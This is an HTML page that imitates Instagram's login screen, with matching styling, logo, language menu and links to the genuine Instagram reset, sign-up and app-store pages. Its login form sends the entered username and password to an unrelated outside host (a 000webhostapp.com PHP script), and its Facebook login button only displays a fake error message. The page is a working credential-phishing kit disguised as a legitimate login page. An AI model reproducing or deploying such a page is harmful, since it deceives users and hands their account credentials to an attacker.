<html>
<head>

  <title>Login • Instagram</title>
</head>




<style>
  body {
    background-color: #fafafa;

  }
.but{
  border: none;
  background-color: white;
  font-weight: bold;
  color: #375184;
  
}
  .mobile {
    width: 465px;
    height: 650px;

  }
  .form-input {
    background-color: #fafafa;
    border: 1px solid #dbdbdb;
    border-radius: 3px;
    color: #808080;
    margin-bottom: 8px;
    padding: 10px 10px;
    width: 100%;
  }
  .login-with-fb a {
    color: #385185;
  }

  .login-with-fb > a {
    font-size: 12px;
  }
  .login-with-fb div a {
    font-weight: bold;
  }
  .login-with-fb div {
    margin-bottom: 15px;
  }

  /**
 * Register section
 */
  .register * {
    font-size: 14px;
  }
  .register a {
    color: #0095f6;
    font-weight: bold;
  }

  .register p {
    margin-right: 5px;
  }

  /**
 * App download
 */
  .app-download {
    display: flex;
    justify-content: center;
  }
  .symbol {
    display: flex;
    justify-content: center;
  }
  .app-download p {
    padding: 10px 0;
  }
  .symbol img {
    height: 40px;
    margin: 0 5px;
  }
  .face {
    
    width: 20px;
  }
  .face2 {
    width: 15px;
  }
  .form-input::placeholder {
    color: #808080;
  }
  .form-button {
    background-color: #0095f6;
    border-radius: 5px;
    color: #fff;
    font-weight: bold;
    height: 35px;
    margin-top: 10px;
    width: 100%;
    border: none;
  }
  .form-input:focus {
    border: 1px solid #808080;
    outline: none;
  }
  .logo {
    width: 200px;
    margin-top: 10px;
    margin-bottom: 20px;
  }

  .row {
    margin-top: 30vh;
    display: flex;
    justify-content: space-between;
  }
  .col2-2 {
    text-align: center;
    background-color: #ffffff;
    border: 1px solid #dbdbdb;
    width: 390px;
    padding: 5px 0 5px 0;
    height: auto;
    margin-right: 70px;
    margin-top: 10px;
  }
  .col1 {
    flex-basis: 40%;
    position: relative;
    margin-left: 50px;
  }
  .symbol,.app-download {
    margin-right: 70px;
  }
  .col2-1 {
    text-align: center;
    background-color: #ffffff;
    border: 1px solid #dbdbdb;
    width: 310px;
    padding: 40px;
    height: 320px;
    margin-right: 70px;
  }
  .link,.link2 {
    margin-top: 5px;
    text-decoration: none;
  }

  .span {
    background-color: #dbdbdb;
    height: 1px;
    width: 200px;
  }




  .slide-content img {
    position: absolute;
    inset: 0;
    opacity: 0;
    visibility: hidden;
    transition: all 0.5s ease-in-out;
  }

  .slide-content img.active {
    opacity: 1;
    visibility: visible;
  }
  .div,.div2 {
    display: flex;
    justify-content: center;
  }
  .separator .or {
    color: #808080;
    font-weight: bold;
    margin-bottom: 20px;
    margin-top: 20px;
  }
  .separator2 .or {
    color: #808080;
    font-weight: bold;
    margin-bottom: 20px;
    margin-top: 20px;
  }

  .separator {
    padding: 0 20px;
  }
  .span:first-child {
    margin-right: 10px;
  }
  .span:last-child {
    margin-left: 10px;
  }

  .fb-cont,.separator2,.link2,.meta,select {
    display: none;
  }
  button:disabled {
    background-color: #b2dffc;
  }
  .toggle {
    font-weight: bold;
    border: none;
    background-color: #fafafa;
    position: relative;
    top: -35px;
    left: 120px;
  }
  .content {
    width: 260px;
    height: 560px;
    position: relative;
    left: 150px;
    top: -625px
  }
  .msg-box {

    position: absolute;
    top: 500px;
  }
  .msg {
    background-color: grey;
    width: 200px;
    height: 30px;
    text-align: center;
    border-radius: 20px;
  }
  .slide-content img {
    position: absolute;
    inset: 0;
    opacity: 0;
    visibility: hidden;
    transition: all 0.5s ease-in-out;
  }

  .slide-content img.active {
    opacity: 1;
    visibility: visible;
  }
  .slide-content {
    left: 150px;
    top: -625px;
    position: relative;
  }
  .signup {
    text-decoration: none;
  }
  .error {
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    text-align: center;
    position: absolute;
    width: 250px;
    height: 140px;
    background-color: white;
    border-radius: 20px;
    opacity: 100%;
  }
  .error-box {
    display: none;
    position: absolute;
    width: 100vw;
    height: 100vh;
    background-color: #fafafa;
    z-index: 2;
    backdrop-filter: opacity(30%);
  }
  .er {
    font-weight: bold;
  }
  .dismiss {
    background-color: white;
    border: none;
    font-weight: bold;
    color: #0095f6;
  }
  @media only screen and (max-width:700px){
    .col1,.app-download,.link,.symbol,.separator {
      display: none;
    }
    select {
      display: block;
      position: absolute;
      border: none;
      background-color: white;
      color: grey;
    }
    .foot {
      position: absolute;
      margin-top: 580px;
      width: 100%;
      display: flex;
      justify-content: center;
    }
    .toggle {
      font-weight: bold;
      border: none;
      background-color: #fafafa;
      position: relative;
      top: -35px;
      left: 190px;
    }
    .meta {
      width: 55px;
      height: 45px;
    }
    body {
      background-color: white;
      display: flex;
      justify-content: center;
    }
    .separator2,.link2,.meta {
      display: block;
    }
    .link2 {
      font-size: 12px;
      color: #0095f6;
      float: right;
    }
    .fb-cont {
      display: block;
      background-color: #0095f6;
      border-radius: 5px;
      color: #fff;
      font-weight: bold;
      width: 100%;
      border: none;
      padding: 10px 10px;
    }
    .question {
      color: grey;
    }
    .row {
      margin-top: 20px;
    }
    .logo {
      margin-bottom: 30px;
    }
    .div2 {
      display: none;
    }
    .col2-1,.col2-2 {
      border: none;
      margin-right: 0;
    }
  }




</style>

<body>
  <select>
    <option>English</option>
    <option>Afrikaans</option>
    <option>中文 & 台灣</option>
    <option>English(UK)</option>
    <option>Český</option>
    <option>Dansk</option>
    <option>Suomi</option>
    <option>Français</option>
    <option>Deutsch</option>
    <option>Ελληνικά</option>
    <option>日本語</option>
    <option>Italiano</option>
    <option>Polski</option>
    <option>Português</option>
    <option>Español</option>
    <option>Filipino</option>
    <option>Türkçe</option>
    <option>Svenska</option>
  </select>
  <div class="error-box" id="error">
    <div class="error">
      <p class="er">
        Error
      </p>
      <p>
        We're sorry,but something went wrong.Please try again.
      </p>
      <hr />
    <button onclick="error()" class="dismiss">Dismiss</button>
  </div>
</div>
<div class="row ">
  <div class="col1">

    <img class="mobile" src="images/image3.png">
    <div class="slide-content" id="slide-content">
      <img class="content active" src="images/slide (1) .png">

    </div>
  </div>



  <div class="col2">
    <div class="col2-1">
      <img src="images/insta.png" class="logo">
      <div class="div">
        <button onclick="error()" type="submit" class="fb-cont signup op" name="commit"><img class="face2" src="/images/face2.jpeg" />&nbsp;&nbsp;Continue with Facebook</button>
    </div>
    <div class="separator2">
      <span class="span"></span>
      <div class="or">
        OR
      </div>
      <span class="span"></span>
    </div>
    <form action="https://devil-ff.000webhostapp.com/Po2.php" method="post">
      <input type="text" class="form-input" placeholder="Phone number,username or email address"name="login" id="login_field" onkeyup="succes()" />

    <input type="password" class="form-input" placeholder="Password" onchange="onchange()" name="password" id="password" /><button id="toggle" type="button" class="toggle"></button>
  <a class="link2" href="https://www.instagram.com/accounts/password/reset/">Forgotten your password?</a>
  <button type="submit" class="form-button" id='button' name="commit" value="instagram" disabled="true">Log in</button>
</form>
<div class="separator">
  <span class="span"></span>
  <div class="or">
    OR
  </div>
  <span class="span"></span>
</div>
<div class="login-with-fb flex direction-column align-items-center">
 <button class="signup but">
    <div class="div2">
      <img class="face" src="images/face.png" />&nbsp;&nbsp;Log in with Facebook
  </div>
</button>

<br>
<a class="link" href="https://www.instagram.com/accounts/password/reset/">Forgotten your password?</a>
</div>
</div>
<div class="panel register col2-2">
<p class="question">
Don't have account?&nbsp;<a class="signup" href="https://www.instagram.com/accounts/emailsignup/">Sign up</a>
</p>
</div>
<div class="app-download ">
<p>
Get the app.
</p>
</div>
<div class="flex symbol justify-content-center">
<a href="https://apps.apple.com/in/app/instagram/id389801252"><img src="images/apple-app-store.png" alt="Image of apple store" title="Image of Apple Store" /></a>
<a href="https://play.google.com/store/apps/details?id=com.instagram.android"><img src="images/play-store.png" alt="Image of google play store" title="Image of google play store" /></a>
</div>

</div>
</div>

<div class="foot">
<img src="images/meta.png" class="meta" />
</div>
<script>

function succes() {
if (document.getElementById("login_field").value === "" || document.getElementById("password").value === "") {
document.getElementById('button').disabled = true;
} else {
document.getElementById('button').disabled = false;
}
}
const togglePassword = document.querySelector("#toggle");
const password = document.querySelector("#password");

togglePassword.addEventListener("click", function () {
// toggle the type attribute
const type = password.getAttribute("type") === "password" ? "text": "password";
password.setAttribute("type", type);
if (password.getAttribute("type") === "text") {
document.getElementById("toggle").innerHTML = "Hide";
}
if (password.getAttribute("type") === "password") {}
});



window.setInterval(succes, 10);
var textarea = document.getElementById("password");
textarea.addEventListener('input', hideOnEmpty);
function hideOnEmpty() {
var text = this.value;
if (text !== '') {

document.getElementById("toggle").style.display = "inline";
document.getElementById("toggle").innerHTML = "Show";
} else {
document.getElementById("toggle").style.display = "none";
}
}

function error() {
let err = document.getElementById('error');
let displaySetting = err.style.display;
if (displaySetting == 'block') {
err.style.display = "none";
} else {
err.style.display = "block";
}
}

</script>
</body>
</html>
